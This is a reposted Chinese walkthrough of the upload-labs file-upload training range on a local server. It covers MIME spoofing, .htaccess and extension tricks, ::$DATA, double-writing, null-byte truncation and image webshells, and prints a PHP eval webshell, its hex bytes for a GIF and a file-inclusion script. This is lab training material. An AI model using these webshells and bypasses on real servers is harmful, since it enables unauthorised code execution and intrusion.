Upload靶场通关笔记

news2025/1/11 0:43:09

文章目录

  • 一、Pass-01
    • 1.抓包上传
    • 2.获取上传路径
    • 3.工具验证
  • 二、Pass-02
  • 三、Pass-03
  • 1.使用httpd.conf自定义后缀
  • 2.提取上传文件名
  • 3.工具测试
  • 4.注意点
  • 四、Pass-04
    • 1.上传.htaccess
    • 2.上传图片
    • 3.工具测试
  • 五、Pass-05
  • 六、Pass-06
    • 1.空格+.号绕过
    • 2.工具测试
  • 七、Pass-07
  • 八、Pass-08
    • 1.特殊符号绕法
    • 2.工具测试
  • 九、Pass-09
    • 1.特殊符号+.+空格组合绕过
    • 2.工具测试
  • 十、Pass-10
    • 1.双写绕过
    • 2.工具测试
  • 十一、Pass-11
  • 十二、Pass-12
    • 1.00截断条件1
    • 2.00截断条件2
    • 3.空格a替换
    • 4.工具测试
  • 十三、Pass-13
    • 1.制作图片马
    • 2.工具测试
  • 十四、Pass-14
  • 十五、Pass-16
    • 1.制作图片马
    • 2.对比修改
    • 3.替换未修改
    • 4.上传测试
  • 十六、Pass-17
  • 十七、Pass-18
  • 十八、Pass-19
  • 十九、Pass-20

在这里插入图片描述

一、Pass-01

在这里插入图片描述在这里插入图片描述

1.抓包上传

只能上传jpg,png,gif格式图片,因此先选一个jpg,然后抓包修改文件类型和文件数据

在这里插入图片描述在这里插入图片描述在这里插入图片描述

2.获取上传路径

接下来需要知道文件上传到哪个目录下
在这里插入图片描述

可以看出上传到上一级目录的upload文件夹了,而当前目录是
http://127.0.0.1/upload/Pass-01/index.php,即http://127.0.0.1/upload/Pass-01/
因此上一级目录是http://127.0.0.1/upload/
即最终上传路径是http://127.0.0.1/upload/upload/
可以看出已上传成功,接下来用工具连接验证下

3.工具验证

在这里插入图片描述

F12解析成功
在这里插入图片描述

说明连接和调用成功

二、Pass-02

还是用上一题的办法

<?php @eval($_POST["fname"]);?>

Content-Type: image/jpeg
Content-Type:application/octet-stream
在这里插入图片描述
在这里插入图片描述

三、Pass-03

不出所料不能用老办法了
在这里插入图片描述

1.使用httpd.conf自定义后缀

那就改后缀绕过,改成3.phtml
在这里插入图片描述
在这里插入图片描述

2.提取上传文件名

在这里插入图片描述

发现可以上传,但是文件名被改了,没关系可以提取,202306261154331548.phtml
验证下看能不能解析,发现不行
在这里插入图片描述

3.工具测试

猜测应该是我的皮卡丘版本较老,换装新版本试下
在这里插入图片描述在这里插入图片描述

菜刀也连接成功了
在这里插入图片描述

4.注意点

值得说明的是一句话代码那里第一个空行不要删,不然上传不会成功的
在这里插入图片描述

四、Pass-04

在这里插入图片描述

显然phtml也被禁了,不信你可以试下
在这里插入图片描述

1.上传.htaccess

尝试使用.htaccess文件,先上传它
在这里插入图片描述

2.上传图片

然后上传图片,只要加一句话木马就行,其他不用改
在这里插入图片描述

3.工具测试

测试下
在这里插入图片描述
在这里插入图片描述在这里插入图片描述

五、Pass-05

在这里插入图片描述

好吧,这关.htaccess也不能用了
大小写绕过
但是Php是不是可以呢
在这里插入图片描述

上传成功,试下能不能运行
在这里插入图片描述在这里插入图片描述

OK 搞定

六、Pass-06

在这里插入图片描述

1.空格+.号绕过

试了下大小写绕过失败,.htaccess上传失败
最后用这种奇怪的方法组合绕过了,即空格+.号绕过
在这里插入图片描述

2.工具测试

在这里插入图片描述在这里插入图片描述

七、Pass-07

在这里插入图片描述

同上题绕法
这个狠,试下上题的方法先
在这里插入图片描述

这次也上传成功了
在这里插入图片描述

工具测试
在这里插入图片描述在这里插入图片描述

OK 搞定

八、Pass-08

在这里插入图片描述在这里插入图片描述

这次不行了

1.特殊符号绕法

试下特殊符号绕法:1.php::$DATA
在这里插入图片描述

果然可以

2.工具测试

在这里插入图片描述在这里插入图片描述

OK 搞定

九、Pass-09

在这里插入图片描述

1.特殊符号+.+空格组合绕过

在这里插入图片描述

2.工具测试

在这里插入图片描述

看来这个也没问题了

十、Pass-10

在这里插入图片描述在这里插入图片描述

1.双写绕过

发现会把php去掉,那就来个双写绕过
在这里插入图片描述

很好,上传成功
在这里插入图片描述

2.工具测试

在这里插入图片描述在这里插入图片描述

OK 搞定

十一、Pass-11

在这里插入图片描述

经尝试,双写绕过失败,特殊符号绕过失败
在这里插入图片描述

00截断绕过
11.php%00.jpg,11.jpg%00.php
这里我们使用00截断绕过,此外还需修改content-Type这个值,因为这样jpg也可以解析了
如下图所示,save_path在上面,说明是get型00截断
在这里插入图片描述

在filename=XX.php%00.jpg
在这里插入图片描述
在这里插入图片描述

十二、Pass-12

在这里插入图片描述

save_path在下面,说明是post型00截断
post型的需要在upload后面追加 XX.php ,php后面有空格
在这里插入图片描述

然后切换到16进制页面,找到空格的位置
在这里插入图片描述

将20改成00
在这里插入图片描述

然后放包
但是失败了
在这里插入图片描述

经查:在php 5.3.4中php修复了0字符,但是在之前的版本中00在php中危害较大
在这里插入图片描述

1.00截断条件1

而我的PHP是5.4.45因此尝试下降级
在这里插入图片描述

2.00截断条件2

其次php.ini中的magic_quotes_gpc是必须off状态的
在这里插入图片描述

3.空格a替换

然后我们在12.php后面加:空格a,a是方便定位,空格16进制换成00后就可以上传php文件了
在这里插入图片描述
在这里插入图片描述

4.工具测试

在这里插入图片描述

十三、Pass-13

在这里插入图片描述

这节应该需要做内容绕过
文件内容绕过:
JPG:JPGGraphicFile;gif:GIF89A,zip:ZipCompressed
doc .xls .xlt .ppt .apr:MSCompoundDocumentv1orLotusApproachAPRfile

1.制作图片马

首先使用dos命令制作图片马
在这里插入图片描述
在这里插入图片描述

然后直接上传2.jpg
在这里插入图片描述

准备本地包含测试代码include.php

<?php
$file = $_GET['file'];
include $file;
?>

2.工具测试

在这里插入图片描述
在这里插入图片描述

十四、Pass-14

在这里插入图片描述

同上题
在这里插入图片描述

15关程序有问题,跳过

十五、Pass-16

在这里插入图片描述

1.制作图片马

首先制作图片马,这次使用gif
在这里插入图片描述

然后上传图片,但是发现上传后的图片被重新编码了,一句话代码找不到了
在这里插入图片描述

2.对比修改

使用EmEditor工具对比看下哪些地方没改
在这里插入图片描述

可以看出上图箭头处这块没动,因此可以将一句话木马替换进去,把左图下面这段复制出来
在这里插入图片描述

3C 3F 70 68 70 20 40 65 76 61 6C 28 24 5F 50 4F 53 54 5B 22 66 6E 61 6D 65 22 5D 29 3B 3F 3E 1A 替换到1.gif这个位置,同时记住这里选了多少个字符,这里是96个
替换到箭头处开始的96个字符之后变成

3.替换未修改

变成
在这里插入图片描述

4.上传测试

然后将1.gif保存上传
在这里插入图片描述

上传成功了
说明没有被过滤掉
在这里插入图片描述

工具测试
在这里插入图片描述
在这里插入图片描述

十六、Pass-17

同上题做法

十七、Pass-18

被保存到上一级目录了,不过没关系还是可以跑
在这里插入图片描述
在这里插入图片描述

十八、Pass-19

同16关做法

十九、Pass-20

同16关做法

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/701489.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

联想黄莹:6G将是全智能应用下连接虚拟与现实世界的“超级通道”

6月28日&#xff0c;以“时不我待”为主题的MWC上海世界移动通信大会正式开幕。在当天下午举办的“6G愿景及关键推动力”大会论坛上&#xff0c;联想集团副总裁、联想研究院5G实验室负责人黄莹博士发表了“共铸辉煌&#xff1a;对6G技术和应用的思考与展望”主题演讲。他认为&a…

STM32F407 GPIO口输出配置配置步骤

STM32F407ZGT6 是意法半导体&#xff08;STMicroelectronics&#xff09;公司推出的一款高性能ARM Cortex-M4核心的32位微控制器&#xff08;MCU&#xff09;。它是 STM32F4 系列的一员&#xff0c;具备强大的处理能力和丰富的外设功能&#xff0c;适用于各种应用领域。 【1】…

3.6.6.异步SIGIO : fcntl(F_GETFL、F_SETFL、O_ASYNC、F_SETOWN) 3.6.7.存储映射IO

3.6.6.异步IO &#xff1a;SIGIO 3.6.6.1、何为异步IO (1)几乎可以认为&#xff1a;异步IO就是操作系统用软件实现的一套中断响应系统。 (2)异步IO的工作方法是&#xff1a;我们当前进程注册一个异步IO事件&#xff08;使用signal注册一个信号SIGIO的处理函数&#xff09;&…

【Django学习】(十)模型序列化器_关联字段序列化

这篇文章是针对模型类序列化器以及如何关联字段序列化 进行深入讲解的&#xff1b; class ProjectModelSerializer(serializers.ModelSerializer):email serializers.EmailField(write_onlyTrue)interfaces InterfaceModelSerializer(label所属接口的信息, help_text所属接口…

git常见操作汇总

存档&#xff0c;方便本人查询~ 除了add、commit、push、pull外有些操作也是需要掌握的~在复习之前先准备一下需要的项目&#xff1a; mkdir git-demo1 cd git-demo1 git init基础操作 # 在工作区新增一个README.md文件&#xff0c;并写入 # Hello World# 查看哪些原件做了修…

Java安全——安全管理器

Java安全 安全管理器 Java安全管理器是一个Java安全模型中的一个组件&#xff0c;主要的作用是提高Java应用程序的安全性。Java应用程序中的每个线程都会对安全管理器进行检查&#xff0c;在执行代码之前&#xff0c;会先经过安全管理器的核验&#xff0c;安全管理器根据代码来…

Flink SQL之Temporal Joins

1.Temporal Joins&#xff08;时态JOIN&#xff09; 时态表是一个随时间演变的表&#xff0c;在Flink中也称为动态表。 时态表中的行与一个或多个时态周期相关联&#xff0c;并且所有Flink表都是时态的&#xff08;动态的&#xff09;。时态表包含一个或多个版本化的表快照&a…

Oracle数据库中的包的介绍及示例

Oracle的包是一种封装存储过程&#xff0c;函数&#xff0c;变量和游标等代码对象的方法。包可以视为一组相关的程序单元&#xff0c;它们共享相同的命名空间和存储空间。包可以被看做是一个数据库程序库&#xff0c;它包含一个或多个程序单元&#xff0c;这些单元可以被视为一…

图片加载失败捕获上报及处理

图片加载失败捕获上报及处理 前端页面中加载最多的静态资源之一就是图片了&#xff0c;当出现图片加载失败时&#xff0c;非常影响用户体验。这时候我们就需要对图片是否成功加载进行判断&#xff0c;并对图片加载失败进行处理。 图片加载监听 单个捕获 HTML中的img标签可以…

vue 组件简单实例及传参交互

前言:vue 可以比较灵活的使用 html的片段&#xff0c;并将html的片段进行数据隔离&#xff0c;参数也可以互相传递&#xff0c;组件与组件之间也可以进行数据的交互 合理的使用组件可以避免重复代码或者很方便的调用第三方组件库 vue组件 简单实例组件传参实际应用父子组件交互…

SpringBoot2+Vue2实战(四)进行组件内容拆分及路由实现

一、拆分 新建包&#xff1a; Aside和Header都是组件 User为视图 Aside.vue&#xff1a; <template><el-menu :default-openeds"[1, 3]" style"min-height: 100%; overflow-x: hidden"background-color"rgb(48, 65, 86)"text-color…

I2C总线协议详解

I2C总线物理拓扑结构 I2C总线物理拓扑图 I2C 总线在物理连接上非常简单&#xff0c;分别由SDA(串行数据线)和SCL(串行时钟线)及上拉电阻组成。通信原理是通过对SCL和SDA线高低电平时序的控制&#xff0c;来 产生I2C总线协议所需要的信号进行数据的传递。在总线空闲状态时&#…

linux下使用pyqt5的QMediaPlayer制作简易播放器(存在进度条、前进、后退、暂停、打开、播放等操作)

目录 1. 问题2. 解决3. 效果 1. 问题 关于pyqt5的qmediaplayer模块制作简易播放器&#xff0c;网上很多博客都是win下的&#xff0c;放在linux系统会出问题&#xff1b;另外&#xff0c;部分博客缺少文件&#xff0c;无法直接使用。 参考博客《基于pyqt5的QMediaPlayer实现视…

android studio git使用

pull代码 我们从远程仓库拉取代码时&#xff0c;一般有下面的两个选项 当使用Android Studio拉取代码时&#xff0c;有两种常见的选项&#xff1a;合并&#xff08;merge&#xff09;传入的更改到当前分支和变基&#xff08;rebase&#xff09;。 合并&#xff08;Merge&…

【Django学习】(九)自定义校验器_单字段_多字段校验_模型序列化器类

之前学习了视图集里运用序列化器进行序列化和反序列化操作&#xff0c;定义序列化器类&#xff0c;需要继承Serializer基类或者Serializer的子类&#xff1b; 这次我们将学习如何自定义校验器、如何进行单字段或者多字段校验&#xff0c;最后初步使用模型序列化器 一、自定义…

OPPO手机无网络可支持3km通信,对讲机将被淘汰?

OPPO在2019世界移动通信大会即MWC上海发布了一项新技术&#xff0c;被称为“无网络通信技术”&#xff08;MeshTalk&#xff09;。这是OPPO自主研发的一项去中心化通讯技术&#xff0c;能够在没有蜂窝网络、Wi-Fi、蓝牙的情况下&#xff0c;实现3km内通讯。 无网通信技术 不过…

Java教程-Java异常抛出

在Java中&#xff0c;异常允许我们编写高质量的代码&#xff0c;可以在编译时检查错误而不是在运行时&#xff0c;并且我们可以创建自定义异常&#xff0c;使代码的恢复和调试更加容易。 Java的throw关键字 Java的throw关键字用于显式地抛出异常。 我们指定要抛出的异常对象。异…

华为breeze ideploy部署流程示例

https://www.cnblogs.com/withfeel/p/11640877.html 华为breeze ideploy部署流程示例

Canal对MySQL进行数据迁移

Canal简单介绍 贴个官方网址&#xff1a;阿里巴巴MySQL binlog 增量订阅&消费组件 架构图&#xff1a; 基于日志增量订阅和消费的业务包括 数据库镜像数据库实时备份索引构建和实时维护(拆分异构索引、倒排索引等)业务 cache 刷新带业务逻辑的增量数据处理 当前的 cana…

CSS知识点汇总(十一)--回流重绘

文章目录 怎么理解回流跟重绘&#xff1f;什么场景下会触发&#xff1f;1、回流和重绘是什么&#xff1f;2、如何触发回流和重绘3、如何避免回流和重绘的发生 怎么理解回流跟重绘&#xff1f;什么场景下会触发&#xff1f; 1、回流和重绘是什么&#xff1f; 在HTML中&#xf…